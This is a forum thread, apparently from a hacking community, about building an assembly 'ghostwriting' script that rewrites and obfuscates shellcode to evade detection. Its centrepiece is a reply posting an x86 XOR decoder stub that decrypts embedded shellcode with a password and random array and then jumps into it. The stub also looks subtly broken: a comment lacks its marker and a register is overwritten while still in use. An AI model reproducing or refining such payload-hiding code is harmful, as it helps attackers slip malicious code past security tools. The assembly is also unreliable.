Re: Part one of an ASM ghostwriting PoC script
So the way I see it this:
JNZ, JZ sets ZF to 0
TEST and CMP set ZF to 1 IF the values are equal and 0 otherwise.
And the rest I have no idea what you said... :P
I need things to be a little more clearly explained, sorry...
World Domination is such an ugly phrase. I prefer the term World Optimization.
Re: Part one of an ASM ghostwriting PoC script
I added JMP, JNZ, JZ, JNE, JE, JNS, JS, CMP, and TEST support in the newest version.
I believe I am now ready to work on the obfuscators, unless someone tells me otherwise.
I do not have JGE, JG, JLE, and JL support as described in my readme.
Also, this is now on github https://github.com/Shadow-Master/
Let me know what you guys think, and whether you have any ideas for obfuscating...
World Domination is such an ugly phrase. I prefer the term World Optimization.
Re: Part one of an ASM ghostwriting PoC script
Hi some obfuscating code
The code proable needs modifing
Three part
256 array for random stuff
16 array of password
0xf0 for shellcode
mov eax, 0x01400101 //find empety spot on heap
and eax, 0xffffff;
mov ebx, esp //mov shellcode address into ebx
xor ecx, ecx
top:
mov edx, [ebx+ecx] //copy array buffer, 256 size with random string
mov [eax+ecx], edx
add ecx, 0x04
cmp ecx, 0xff
jnz top;
mov esp, eax
add esp, ecx
add ecx, 0x04;
top1:
mov edx, [ebx+ecx] //copy password into array
mov [eax+ecx], edx
add ecx, 0x04
cmp ecx, 0x010f
jnz top1;
mov esi, eax //save decreypted address
add esi, ecx
add ecx, 0x04
top2:
mov edi, [ebx+ecx] //mov encrypted part into edi
and edi, 0xff //grab byte
mov ebp, eax //mov random array address into ebp
mov ebx, [esp+ecx] //grab password data
xor ebx, [ebp+edi] xor ebx, with password and random data
mov [eax+ecx], ebx
inc ecx //move to next byte
cmp ecx, 0x01f0 //length of shellcode
jnz top2
jmp esi //jump to decomprypted code
Re: Part one of an ASM ghostwriting PoC script
Very cool. I am going to add a new mode with a static decoder to compiled with the shellcode to use this, and similar, functions.
Where I stand now is to come up with some sort of general outline for an engine to produce ASM code to obtain a specific value in a specific spot. No specifics, just generalities.
Also, I need to finish making an outline for community produced Line-by-line replacement modules, then finish implementing -l|line-by-line in the script.
When I make at least one module for each instruction, and can replace them without error, then I will post them, and post the rules for making modules, similar to the msf.
World Domination is such an ugly phrase. I prefer the term World Optimization.
Posting Permissions
